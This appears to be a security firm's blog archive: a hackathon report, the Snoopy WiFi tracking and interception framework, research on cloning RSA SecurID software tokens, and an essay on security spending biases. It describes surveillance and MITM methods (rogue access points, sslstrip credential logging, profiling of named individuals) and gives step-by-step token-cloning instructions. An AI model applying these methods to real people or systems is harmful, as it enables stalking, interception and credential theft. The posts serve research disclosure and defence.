Grey bar Blue bar
Share this:

Wed, 5 Dec 2012

SensePost Hackathon 2012

Last month saw the inaugural SensePost hackathon happen in our new offices in Brooklyn, South Africa. It was the first time the entire company would be in the same room, let alone the same continent, together and away from the pressures of daily work constraints. The idea was simple: weeks before the date, we sent out emails to everyone in the company (not just the tech teams but everyone) to think about ideas, tools, approaches or new business lines that they felt would make us even better at what we did.

Hackathons are used by many tech companies to give their employees breathing space to work on new ideas. Google and Facebook are big fans and Facebook's Like button was conceived as part of a hackathon. Getting everyone together at the same time was no mean feat, the term 'herding cats' springs to mind but on the week of 12th of November, all SensePost'rs were in our new offices and ready to break, build and develop.

Prior to the event, we asked everyone to think about what they wanted to work on. As mentioned above, there was no specific guideline as to what anyone could come up with, as you can't force creativity. After a brainstorming session, the following ideas were given and solutions made during the hackathon period*:

1. SensePost World App

A mobile application (multi-platform) that will streamline the process of receipts, expenses, travel requests, holiday leave etc.

2. SensePost IRC Bot

A IRC bot that will offer:

  1. Integration with our internal twitter clone
  2. SMS functionality to summon $person
  3. Location whereabouts functionality (who is in the office, who's at a client etc.)
  4. Cool links functionality
  5. SensePost short URL functionality
  6. Ability to call $username via Gtalk/Skype
3. SensePost SMS Gateway App

An application that allows us to utilise SMS from a company-wide perspective, including:

  1. Ability to receive OTP passwords to a central number
  2. Ability to send passwords to clients via web interface (for sales)
  3. Ability to send HackRack passwords to clients via web interface
Rogan decided to use kannel to interface with a GSM dongle in an Ubuntu server. This exposed a web API. Glenn then wrote a Python script to monitor for new mail arriving to a SensePost email address, which then dispatched SMSs via kannel.

4. Magstripe Hacking

Having moved into our new fancy offices, we decided to look at the current implementation of magstripe used to work out if we could read the data, clone the data and create free parking for us (at the same time, potentially looking for flaws in the magstripe implementation). The magstripes on the parking tickets were very unsual. Between the reader in the office, and Andrew Mohawk's more advanced ones, we could not get a consistent read. It is possible that the cards use an unusual arrangement of tracks. Typically there are 3 horizontal tracks at predefined heights. If the tracks are at unusual heights we may have been getting interference between said tracks. Andrew has tried to dissect one of the cards, but no luck yet.

Watch this space. 5. AV VirusTotal Project

Rather than submitting our payloads to VirusTotal (who then inform the vendors), we will create our own version that uses all vendors, to determine if our custom payloads could be detected.

6. SensePost Green Project

A project to make our business greener in approach and ideas. How responsibly were we using resources? What was our consumption of electricity and water like and could it be made better?

With teams created and everyone clear on what they had to do, 48-hours were given to create the above ideas. Food, drink, hardware and toys were provided. Vlad brought some amazing Russian Vodka and energy drinks were supplied.

Whilst the older farts faded quickly (I'll put my hand up, 1am and I was broken), the younger crowd went through the night and into the next morning. From simple ideas at first, fully-fledged solutions were designed and then developed in a short space of time. The idea was that once the hackathon 48-hour period was over, everyone would present the results and we'd head outside to our balcony to have a traditional SA braai (barbecue)

The cool thing about the hackathon was that some of the top ideas came from traditionally non-technical people, such as our finance wizard who came up with the idea of the SensePost world app. This was the outcome that we wanted: to prove that you don't need to be a heavy tech-orientated person to come up with meaningful projects or ideas.

Overall the 2012 Hackathon was a brilliant time had. Some amazing ideas have come to light, ones that will see us pushing offensive approaches and also ones that will have an impact on the way we work at SensePost.

For those thinking about running an internal hackathon, I'd say go for it. Giving people the space to work on ideas with likeminded colleagues will only bring benefits.

*There were other projects, but they won't see the light of day as of yet, so will remain confidential until the time is right.

Tue, 25 Sep 2012

Snoopy: A distributed tracking and profiling framework

At this year's 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users through the use of WiFi. The talk was well received (going on what people said afterwards) by those attending the conference and it was great to see so many others as excited about this as we have been.

In addition to the research, we both took a different approach to the presentation itself. A 'no bullet points' approach was decided upon, so the slides themselves won't be that revealing. Using Steve Jobs as our inspiration, we wanted to bring back the fun to technical conferences, and our presentation hopefully represented that. As I type this, I have been reliably informed that the DVD, and subsequent videos of the talk, is being mastered and will be ready shortly. Once we have it, we will update this blog post. In the meantime, below is a description of the project.

Background

There have been recent initiatives from numerous governments to legalise the monitoring of citizens' Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism. Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere.

Snoopy

The above inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data? Rather than terrorist-hunting, we would perform simple tracking and real-time + historical profiling of devices and the people who own them. It is perhaps worth mentioning at this point that Snoopy is compromised of various existing technologies combined into one distributed framework.

"Snoopy is a distributed tracking and profiling framework."

Below is a diagram of the Snoopy architecture, which I'll elaborate on:

1. Distributed?

Snoopy runs client side code on any Linux device that has support for wireless monitor mode / packet injection. We call these "drones" due to their optimal nature of being small, inconspicuous, and disposable. Examples of drones we used include the Nokia N900, Alfa R36 router, Sheeva plug, and the RaspberryPi. Numerous drones can be deployed over an area (say 50 all over London) and each device will upload its data to a central server.

2. WiFi?

A large number of people leave their WiFi on. Even security savvy folk; for example at BlackHat I observed >5,000 devices with their WiFi on. As per the RFC documentation (i.e. not down to individual vendors) client devices send out 'probe requests' looking for networks that the devices have previously connected to (and the user chose to save). The reason for this appears to be two fold; (i) to find hidden APs (not broadcasting beacons) and (ii) to aid quick transition when moving between APs with the same name (e.g. if you have 50 APs in your organisation with the same name). Fire up a terminal and bang out this command to see these probe requests:

tshark -n -i mon0 subtype probereq

(where mon0 is your wireless device, in monitor mode)

2. Tracking?

Each Snoopy drone collects every observed probe-request, and uploads it to a central server (timestamp, client MAC, SSID, GPS coordinates, and signal strength). On the server side client observations are grouped into 'proximity sessions' - i.e device 00:11:22:33:44:55 was sending probes from 11:15 until 11:45, and therefore we can infer was within proximity to that particular drone during that time.

We now know that this device (and therefore its human) were at a certain location at a certain time. Given enough monitoring stations running over enough time, we can track devices/humans based on this information.

3. Passive Profiling?

We can profile device owners via the network SSIDs in the captured probe requests. This can be done in two ways; simple analysis, and geo-locating.

Simple analysis could be along the lines of "Hmm, you've previously connected to hooters, mcdonalds_wifi, and elCheapoAirlines_wifi - you must be an average Joe" vs "Hmm, you've previously connected to "BA_firstclass, ExpensiveResataurant_wifi, etc - you must be a high roller".

Of more interest, we can potentially geo-locate network SSIDs to GPS coordinates via services like Wigle (whose database is populated via wardriving), and then from GPS coordinates to street address and street view photographs via Google. What's interesting here is that as security folk we've been telling users for years that picking unique SSIDs when using WPA[2] is a "good thing" because the SSID is used as a salt. A side-effect of this is that geo-locating your unique networks becomes much easier. Also, we can typically instantly tell where you work and where you live based on the network name (e.g BTBusinessHub-AB12 vs BTHomeHub-FG12).

The result - you walk past a drone, and I get a street view photograph of where you live, work and play.

4. Rogue Access Points, Data Interception, MITM attacks?

Snoopy drones have the ability to bring up rogue access points. That is to say, if your device is probing for "Starbucks", we'll pretend to be Starbucks, and your device will connect. This is not new, and dates back to Karma in 2005. The attack may have been ahead of its time, due to the far fewer number of wireless devices. Given that every man and his dog now has a WiFi enabled smartphone the attack is much more relevant.

Snoopy differentiates itself with its rogue access points in the way data is routed. Your typical Pineapple, Silica, or various other products store all intercepted data locally, and mangles data locally too. Snoopy drones route all traffic via an OpenVPN connection to a central server. This has several implications:

(i) We can observe traffic from *all* drones in the field at one point on the server. (ii) Any traffic manipulation needs only be done on the server, and not once per drone. (iii) Since each Drone hands out its own DHCP range, when observing network traffic on the server we see the source IP address of the connected clients (resulting in a unique mapping of MAC <-> IP <-> network traffic). (iv) Due to the nature of the connection, the server can directly access the client devices. We could therefore run nmap, Metasploit, etc directly from the server, targeting the client devices. This is a much more desirable approach as compared to running such 'heavy' software on the Drone (like the Pineapple, pr Pwnphone/plug would). (v) Due to the Drone not storing data or malicious tools locally, there is little harm if the device is stolen, or captured by an adversary.

On the Snoopy server, the following is deployed with respect to web traffic:

(i) Transparent Squid server - logs IP, websites, domains, and cookies to a database (ii) sslstrip - transparently hijacks HTTP traffic and prevent HTTPS upgrade by watching for HTTPS links and redirecting. It then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. All credentials are logged to the database (thanks Ian & Junaid). (iii) mitmproxy.py - allows for arbitary code injection, as well as the use of self-signed SSL certificates. By default we inject some JavaScipt which profiles the browser to discern the browser version, what plugins are installed, etc (thanks Willem).

Additionally, a traffic analysis component extracts and reassembles files. e.g. PDFs, VOiP calls, etc. (thanks Ian).

5. Higher Level Profiling? Given that we can intercept network traffic (and have clients' cookies/credentials/browsing habbits/etc) we can extract useful information via social media APIs. For example, we could retrieve all Facebook friends, or Twitter followers.

6. Data Visualization and Exploration? Snoopy has two interfaces on the server; a web interface (thanks Walter), and Maltego transforms.

-The Web Interface The web interface allows basic data exploration, as well as mapping. The mapping part is the most interesting - it displays the position of Snoopy Drones (and client devices within proximity) over time. This is depicted below:

-Maltego Maltego Radium has recently been released; and it is one awesome piece of kit for data exploration and visualisation.What's great about the Radium release is that you can combine multiple transforms together into 'machines'. A few example transformations were created, to demonstrate:

1. Devices Observed at both 44Con and BlackHat Vegas Here we depict devices that were observed at both 44Con and BlackHat Las Vegas, as well as the SSIDs they probed for.

2. Devices at 44Con, pruned Here we look at all devices and the SSIDs they probed for at 44Con. The pruning consisted of removing all SSIDs that only one client was looking for, or those for which more than 20 were probing for. This could reveal 'relationship' SSIDs. For example, if several people from the same company were attending- they could all be looking for their work SSID. In this case, we noticed the '44Con crew' network being quite popular. To further illustrate Snoopy we 'targeted' these poor chaps- figuring out where they live, as well as their Facebook friends (pulled from intercepted network traffic*).

Snoopy Field Experiment

We collected broadcast probe requests to create two main datasets. I collected data at BlackHat Vegas, and four of us sat in various London underground stations with Snoopy drones running for 2 hours. Furthermore, I sat at King's Cross station for 13 hours (!?) collecting data. Of course it may have made more sense to just deploy an unattended Sheeva plug, or hide a device with a large battery pack - but that could've resulted in trouble with the law (if spotted on CCTV). I present several graphs depicting the outcome from these trials:

The pi chart below depicts the proportion of observed devices per vendor, from the total sample of 77,498 devices. It is interesting to see Apple's dominance. pi_chart

The barchart below depicts the average number of broadcast SSIDs from a random sample of 100 devices per vendor (standard deviation bards need to be added - it was quite a spread).

The barchart below depicts my day sitting at King's Cross station. The horizontal axis depicts chunks of time per hour, and the vertical access number of unique device observations. We clearly see the rush hours.

Potential Use

What could be done with Snoopy? There are likely legal, borderline, and illegal activities. Such is the case with any technology.

Legal -Collecting anonymized statistics on thoroughfare. For example, Transport for London could deploy these devices at every London underground to get statistics on peak human traffic. This would allow them to deploy more staff, or open more pathways, etc. Such data over the period of months and years would likely be of use for future planning. -Penetration testers targeting clients to demonstrate the WiFi threat.

Borderline -This type of technology could likely appeal to advertisers. For example, a reseller of a certain brand of jeans may note that persons who prefer certain technologies (e.g. Apple) frequent certain locations. -Companies could deploy Drones in one of each of their establishments (supermarkets, nightclubs, etc) to monitor user preference. E.g. a observing a migration of customers from one establishment to another after the deployment of certain incentives (e.g. promotions, new layout). -Imagine the Government deploying hundreds of Drones all over a city, and then having field agents with mobile Drones in their pockets. This could be a novel way to track down or follow criminals. The other side of the coin of course being that they track all of us...

Illegal -Let's pretend we want to target David Beckham. We could attend several public events at which David is attending (Drone in pocket), ensuring we are within reasonable proximity to him. We would then look for overlap of commonly observed devices over time at all of these functions. Once we get down to one device observed via this intersection, we could assume the device belongs to David. Perhaps at this point we could bring up a rogue access point that only targets his device, and proceed maliciously from there. Or just satisfy ourselves by geolocating places he frequents. -Botnet infections, malware distribution. That doesn't sound very nice. Snoopy drones could be used to infect users' devices, either by injection malicious web traffic, or firing exploits from the Snoopy server at devices. -Unsolicited advertising. Imagine browsing the web, and an unscrupulous 3rd party injects viagra adverts at the top of every visited page?


Similar tools

Immunity's Stalker and Silica Hubert's iSniff GPS

Snoopy in the Press

Risky Biz Podcast Naked Scientist Podcast(transcript) The Register Fierce Broadband Wireless

***FAQ***

Q. But I use WPA2 at home, you can't hack me! A. True - if I pretend to be a WPA[2] network association it will fail. However, I bet your device is probing for at least one open network, and when I pretend to be that one I'll get you.

Q. I use Apple/Android/Foobar - I'm safe! A. This attack is not dependent on device/manufacture. It's a function of the WiFi specification. The vast majority of observed devices were in fact Apple (>75%).

Q. How can I protect myself? A. Turn off your WiFi when you l leave home/work. Be cautions about using it in public places too - especially on open networks (like Starbucks). A. On Android and on your desktop/laptop you can selectively remove SSIDs from your saved list. As for iPhones there doesn't seem to be option - please correct me if I'm wrong? A. It'd be great to write an application for iPhone/Android that turns off probe-requests, and will only send them if a beacon from a known network name is received.

Q. Your research is dated and has been done before! A. Some of the individual components, perhaps. Having them strung together in our distributed configuration is new (AFAIK). Also, some original ideas where unfortunately published first; as often happens with these things.

Q. But I turn off WiFi, you'll never get me! A. It was interesting to note how many people actually leave WiFi on. e.g. 30,000 people at a single London station during one day. WiFi is only one avenue of attack, look out for the next release using Bluetooth, GSM, NFC, etc :P

Q. You're doing illegal things and you're going to jail! A. As mentioned earlier, the broadcast nature of probe-requests means no laws (in the UK) are being broken. Furthermore, I spoke to a BT Engineer at 44Con, and he told me that there's no copyright on SSID names - i.e. there's nothing illegal about pretending to be "BTOpenzone" or "SkyHome-AFA1". However, I suspect at the point where you start monitoring/modifying network traffic you may get in trouble. Interesting to note that in the USA a judge ruled that data interception on an open network is not illegal.

Q. But I run iOS 5/6 and they say this is fixed!! A. Mark Wuergler of Immunity, Inc did find a flaw whereby iOS devices leaked info about the last 3 networks they had connected to. The BSSID was included in ARP requests, which meant anyone sniffing the traffic originating from that device would be privy to the addresses. Snoopy only looks at broadcast SSIDs at this stage - and so this fix is unrelated. We haven't done any tests with the latest iOS, but will update the blog when we have done so.

Q. I want Snoopy! A. I'm working on it. Currently tidying up code, writing documentation, etc. Soon :-)

Thu, 24 May 2012

RSA SecureID software token update

There has been a healthy reaction to our initial post on our research into the RSA SecureID Software Token. A number of readers had questions about certain aspects of the research, and I thought I'd clear up a number of concerns that people have.

The research pointed out two findings; the first of which is in fact a design vulnerability in RSA software's "Token Binding" mechanism. The second finding is another design issue that affects not only RSA software token but also any other software, which generates pseudo-random numbers from a "secret seed" running on traditional computing devices such as laptops, tablets or mobile phones. The correct way of performing this has been approached with hardware tokens, which are often tamper-resistant.

Let me first explain one of the usual use cases of RSA software token deployments:

  1. The user applies for a token via a RSA self-service console or a custom web form
  2. The user receives an email which contains the "software token download URL", once the software is installed, they should open the program and then choose Token Storage Devices where they would read the "Device Serial Number" and reply back with this device serial number to complete their token request.
  3. The second email will contain an attachment of the user's personal RSA SecurID Token Configuration file, which they will import to the RSA software token. This configuration file is bound to the users' laptop or PC.
  4. The third email contains an initial password to activate the token.
An attacker who is able to capture the victim's configuration file and initial password (The security of this initial password is subject to future research at SensePost and will be released in the future) would be able to import it into his token using the described method to bypass the token binding. This attack can be launched remotely and does not require a "fully compromised machine" as RSA have stated.

The second finding, as I mentioned before, is a known issue with all software tokens. Our aim at SensePost was to demonstrate how easy/hard it would be for an attacker, who has already compromised a system, to extract RSA token secrets and clone them on another machine. A number of people commented on the fact that we did not disclose the steps required to update the LSA secrets on the cloned system. Whilst this technique is relatively easy to do, it is not required for this attack to function.

If a piece of malware was written for this attack, it does NOT have to grab the DPAPI blobs and replicate them on the attackers machine. It can simply hook into the CryptUnprotectData and steal the decrypted blobs once the RSA software token starts execution. The sole reason I included the steps to replicate the DPAPI on another machine, was that this research was performed during a real world assessment, which was time-limited. We chose to demonstrate the attack to the client by replicating the DPAPI blobs instead of developing a proof of concept malcode.

A real-world malware targeting RSA software tokens would choose the API hooking method or a similar approach to grab the decrypted seed and post it back to the attacker.

"I'm also curious to know whether software token running on smartphones might be vulnerable."

The "Token Binding" bypass attack would be successful on these devices, but with a different device serial ID calculation formula. However, the application sandboxing model deployed on most modern smartphone operating systems, would make it more difficult for a malicious application, deployed on the device, to extract the software token's secret seeds. Obviously, if an attacker has physical access to a device for a short time, they would be able to extract those secrets. This is in contrast to tamper-proof hardware tokens or smart cards, which by design provide a very good level of protection, even if they are in the hands of an attacker for a long time.

"Are the shortcomings you document particular to RSA or applicable to probably applicable to Windows software tokens from rival vendors too?"

All software tokens found to be executing a pseudo-random number generation algorithm that is based on a "secret value", are vulnerable to this type of cloning attack, not because of algorithms vulnerabilities, but simply because the software is running on an operating system and storage that is not designed to be tamper-resistance like modern smart cards, TPM chips and secure memory cards.

One solution for this might be implementing a "trusted execution" environment into CPUs, which has been done before for desktop and laptops by Intel (Intel TXT) and AMD. ARM's "trustzone" technology is a similar implementation, which targets mobile phone devices and secures mobile software's from logical and a range of physical attacks.

Thu, 17 May 2012

A closer look into the RSA SecureID software token

Widespread use of smart phones by employees to perform work related activities has introduced the idea of using these devices as an authentication token. As an example of such attempts, RSA SecureID software tokens are available for iPhone, Nokia and the Windows platforms. Obviously, mobile phones would not be able to provide the level of tamper-resistance that hardware tokens would, but I was interested to know how easy/hard it could be for a potential attacker to clone RSA SecureID software tokens. I used the Windows version of the RSA SecurID Software Token for Microsoft Windows version 4.10 for my analysis and discovered the following issues:

Device serial number of tokens can be calculated by a remote attacker :

Every instance of the installed SecurID software token application contains a hard drive plug-in (implemented in tokenstoreplugin.dll) that has a unique device serial number. This serial number can be used for "Device Binding" and the RSA documentation defines it as follows:

Before the software token is issued by RSA Authentication Manager, an additional extension attribute (<DeviceSerialNumber/>) can be added to the software token record to bind the software token to a specific devicedevice serial number is used to bind a token to a specific device. If the same user installs the application on a different computer, the user cannot import software tokens into the application because the hard drive plug-in on the second computer has a different device serial number from the one to which the user's tokens are bound”.
Reverse engineering the Hard-Disk plugin (tokenstoreplugin.dll) indicated that the device serial number is dependent on the system's host name and current user's windows security identifier (SID). An attacker, with access to these values, can easily calculate the target token's device serial number and bypass the above mentioned protection. Account SIDs can be enumerated in most of the Microsoft active directory based networks using publicly available tools, if the “enumeration of SAM accounts and shares” security setting was not set to disabled. Host names can be easily resolved using internal DNS or Microsoft RPC. The following figures show the device serial number generation code:

The SecureID device serial number calculation can be represented with the following formula:

device_serial_number=Left(SHA1(host_name+user_SID+“RSA Copyright 2008”),10)

Token's copy protection:

The software token information, including the secret seed value, is stored in a SQLite version 3 database file named RSASecurIDStorage under the “%USERPROFILE%\Local Settings\Application Data\RSA\RSA SecurID Software Token Library” directory. This file can be viewed by any SQLite database browser, but sensitive information such as the checksum and seed values are encrypted. RSA documentation states that this database file is both encrypted and copy protected: “RSA SecurID Software Token for Windows uses the following data protection mechanisms to tie the token database to a specific computer:

• Binding the database to the computer's primary hard disk drive

• Implementing the Windows Data Protection API (DPAPI)

These mechanisms ensure that an intruder cannot move the token database to another computer and access the tokens. Even if you disable copy protection, the database is still protected by DPAPI.”

The RSASecurIDStorage database file has two tables: PROPERTIES and TOKENS. The DatabaseKey and CryptoChecksum rows found in the PROPERTIES tables were found to be used for copy protection purpose as shown in the figure below:

Reverse engineering of the copy protection mechanism indicated that:

  • The CryptoChecksum value is encrypted using the machine's master key, which can only be decrypted on the same computer system, unless the attacker can find a way to import the machine key and other supporting data to their machine
  • The DatabaseKey is encrypted using the current logged-on user's master key and provides token binding to that user account
Previous research on the Microsoft Windows DPAPI internals has made offline decryption of the DPAPI protected data possible. This means that if the attacker was able to copy the RSA token database file along with the encryption master keys to their system (for instance by infecting a victim's machine with a rootkit), then it would be possible to decrypt the token database file on their machine. The detailed attack steps to clone a SecurID software token by copying the token database file from a victim's system are as follows:
  1. Copy the token database file, RSASecurIDStorage, from the user profile directory
  2. Copy the user's master key from %PROFILEDIR%\Application Data\Microsoft\Protect\%SID%; the current master key's GUID can be read from Preferred file as shown in the figure below:
  3. Copy the machine's master key from the %WINDIR%\system32\Microsoft\Protect\ directory. Microsoft Windows protects machine keys against tampering by using SHA1 hash values, which are stored and handled by the Local Security Authority Subsystem Service (LSASS) process in Microsoft Windows operating systems. The attacker should also dump these hash values from LSA using publicly available tools like lsadump.
  4. Having all the required master keys and token database file, install and deploy a windows machine and change the machine and user SIDs to the victim's system SID by using available tools such as newSID.
  5. Overwrite the token database file, user and machine master keys with the ones copied from victim's system. You would also need to find a way to update the DPAPI_SYSTEM value in LSA secrets of the Windows machine. Currently, this is the only challenge that I was not able to solve , but it should be possible to write a tool similar to lsadump which updates LSA secrets.
  6. When the above has been performed, you should have successfully cloned the victim's software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim's token.
In order to demonstrate the possibility of the above mentioned attack, I installed and activated token A and token B on two separate windows XP virtual machines and attempted to clone token B on the virtual machine that was running token A. Taking the above steps, token B was successfully cloned on the machine running token A as shown in the following figures:

In order to counter the aforementioned issues, I would recommend the use of "trusted platform module" (TPM) bindings, which associates the software token with the TPM chip on the system (TPM chip for mobiles? there are vendors working on it).

Thu, 3 Nov 2011

Squinting at Security Drivers and Perspective-based Biases

While doing some thinking on threat modelling I started examining what the usual drivers of security spend and controls are in an organisation. I've spent some time on multiple fronts, security management (been audited, had CIOs push for priorities), security auditing (followed workpapers and audit plans), pentesting (broke in however we could) and security consulting (tried to help people fix stuff) and even dabbled with trying to sell some security hardware. This has given me some insight (or at least an opinion) into how people have tried to justify security budgets, changes, and findings or how I tried to. This is a write up of what I believe these to be (caveat: this is my opinion). This is certainly not universalisable, i.e. it's possible to find unbiased highly experienced people, but they will still have to fight the tendencies their position puts on them. What I'd want you to take away from this is that we need to move away from using these drivers in isolation, and towards more holistic risk management techniques, of which I feel threat modelling is one (although this entry isn't about threat modelling).

Auditors

The tick box monkeys themselves, they provide a useful function, and are so universally legislated and embedded in best practise, that everyone has a few decades of experience being on the giving or receiving end of a financial audit. The priorities audit reports seem to drive are:

  • Vulnerabilities in financial systems. The whole audit hierarchy was created around financial controls, and so sticks close to financial systems when venturing into IT's space. Detailed and complex collusion possibilities will be discussed when approving payments, but the fact that you can reset anyone's password at the helpdesk is sometimes missed, and more advanced attacks like token hijacking are often ignored.
  • Audit house priorities. Audit houses get driven just like anyone else. While I wasn't around for Enron, the reverberations could still be felt years later when I worked at one. What's more, audit houses are increasingly finding revenue coming from consulting gigs and need to keep their smart people happy. This leads to external audit selling "add-ons" like identity management audits (sometimes, they're even incentivised to).
  • Auditor skills. The auditor you get could be an amazing business process auditor but useless when it comes to infosec, but next year it could be the other way around. It's equally possibly with internal audit. Thus, the strengths of the auditor will determine where you get nailed the hardest.
  • The Rotation plan. This year system X, next year system Y. It doesn't mean system X has gotten better, just that they moved on. If you spend your year responding to the audit on system Y and ignore X, you'll miss vital stuff.
  • Known systems. External and internal auditors don't know IT's business in detail. There could be all sorts of critical systems (or pivot points) that are ignored because they weren't in the "flow of financial information" spread sheet.
Vendors Security vendors are the love to hate people in the infosec world. Thinking of them invokes pictures of greasy salesmen phoning your CIO to ask if your security chumps have even thought about network admission control (true story). On the other hand if you've ever been a small team trying to secure a large org, you'll know you can't do it without automation and at some point you'll need to purchase some products. Their marketing and sales people get all over the place and end up driving controls; whether it's “management by in-flight magazine”, an idea punted at a sponsored conference, or the result of a sales meeting.

But security vendors prioritisation of controls are driven by:

  • New Problems. Security products that work eventually get deployed everywhere they're going to be deployed. They continue to bring in income, but the vendor needs a new bright shiny thing they can take to their existing market and sell. Thus, new problems become new scary things that they can use to push product. Think of the Gartner hype curve. Whatever they're selling, be it DLP, NAC, DAM, APT prevention or IPS if your firewall works more like a switch and your passwords are all "P@55w0rd" then you've got other problems to focus on first.
  • Overinflated problems. Some problems really aren't as big as they're made out to be by vendors, but making them look big is a key part of the sell. Even vendors who don't mean to overinflate end up doing it just because they spend all day thinking of ways to justify (even legitimate) purchases.
  • Products as solutions. Installing a product designed to help with a problem isn't the same as fixing the problem, and vendors aren't great at seeing that (some are). Take patch management solutions, there are some really awesome, mature products out there, but if you can't work out where your machines are, how many there are or get creds to them, then you've got a long way to go before that product starts solving the problem it's supposed to.
Pentesters

Every year around Black Hat Vegas/Pwn2Own/AddYourConfHere time a flurry of media reports hit the public and some people go into panic mode. I remember The DNS bug, where all that was needed was for people to apply a patch, but which, due to the publicity around it, garnered a significant amount of interest from people who it usually wouldn't, and probably shouldn't have cared so much. But many pentesters trade on this publicity; and some pentesting companies use this instead of a marketing budget. That's not their only, or primary, motivation, and in the end things get fixed, new techniques shared and the world a better place. The cynical view then is that some of the motivations for vulnerability researchers, and what they end up prioritising are:

  • New Attacks. This is somewhat similar to the vendors optimising for "new problems" but not quite the same. When Errata introduced Hamster at ToorCon ‘07, I heard tales of people swearing at them from the back. I wasn't there, but I imagine some of the calls were because Layer 2 attacks have been around and well known for over a decade now. Many of us ignored FireSheep for the same reason, even if it motivated the biggest moves to SSL yet. But vuln researchers and the scene aren't interested, it needs to be shiny, new and leet . This focus on the new, and the press it drives, has defenders running around trying to fix new problems, when they haven't fixed the old ones.
  • Complex Attacks. Related to the above, a new attack can't be really basic to do well, it needs to involve considerable skill. When Mark Dowd released his highly complex flash attack, he was rightly given much kudos. An XSS attack on the other hand, was initially ignored by many. However, one lead to a wide class of prevalent vulns, while the other requires you to be, well, Mark Dowd. This mean some of the issues that should be obvious, that underpin core infrastructure, but that aren't sexy, don't get looked at.
  • Shiny Attacks. Some attacks are just really well presented and sexy. Barnaby Jack had an ATM spitting out cash and flashing "Jackpot", that's cool, and it gets a room packed full of people to hear his talk. Hopefully it lead to an improvement in security of some of the ATMs he targeted, but the vulns he exploited were the kinds of things big banks had mostly resolved already, and how many people in the audience actually worked in ATM security? I'd be interested to see if the con budget from banks increased the year of his talk, even if they didn't, I suspect many a banker went to his talk instead of one that was maybe talking about a more prevalent or relevant class of vulnerabilities their organisation may experience. Something Thinkst says much better here.
Individual Experience

Unfortunately, as human beings, our decisions are coloured by a bunch of things, which cause us to make decisions either influenced or defined by factors other than the reality we are faced with. A couple of those lead us to prioritising different security motives if decision making rests solely with one person:

  • Past Experience. Human beings develop through learning and consequences. When you were a child and put your hand on a stove hot plate, you got burned and didn't do it again. It's much the same every time you get burned by a security incident, or worse, internal political incident. There's nothing wrong with this, and it's why we value experience; people who've been burned enough times not to let mistakes happen again. However, it does mean time may be spent preventing a past wrong, rather than focusing on the most likely current wrong. For example, one company I worked with insisted on an overly burdensome set of controls to be placed between servers belonging to their security team and the rest of the company network. The reason for this was due to a previous incident years earlier, where one of these servers had been the source of a Slammer outbreak. While that network was never again a source of a virus outbreak, their network still got hit by future outbreaks from normal users, via the VPN, from business partners etc. In this instance, past experience was favoured over a comprehensive approach to the actual problem, not just the symptom.
  • New Systems. Usually, the time when the most budget is available to work on a system is during its initial deployment. This is equally true of security, and the mantra is for security to be built in at the beginning. Justifying a chunk of security work on the mainframe that's been working fine for the last 10 years on the other hand is much harder, and usually needs to hook into an existing project. The result is that it's easier to get security built into new projects than to force an organisation to make significant “security only” changes to existing systems. The result in those that present the vulnerabilities pentesters know and love get less frequently fixed.
  • Individual Motives. We're complex beings with all sorts of drivers and motivations, maybe you want to get home early to spend some time with your kids, maybe you want to impress Bob from Payroll. All sorts of things can lead to a decision that isn't necessarily the right security one. More relevantly however, security tends to operate in a fairly segmented matter, while some aspects are “common wisdom”, others seem rarely discussed. For example, the way the CISO of Car Manufacturer A and the CISO of Car Manufacturer B set up their controls and choose their focus could be completely different, but beyond general industry chit-chat, there will be little detailed discussion of how they're securing integration to their dealership network. They rely on consultants, who've seen both sides for that. Even then, one consultant may think that monitoring is the most important control at the moment, while another could think mobile security is it.
So What?

The result of all of this is that different companies and people push vastly different agendas. To figure out a strategic approach to security in your organisation, you need some objective risk based measurement that will help you secure stuff in an order that mirrors the actual risk to your environment. While it's still a black art, I believe that Threat Modelling helps a lot here, a sufficiently comprehensive methodology that takes into account all of your infrastructure (or at least admits the existence of risk contributed by systems outside of a “most critical” list) and includes valid perspectives from above tries to provide an objective version of reality that isn't as vulnerable to the single biases described above.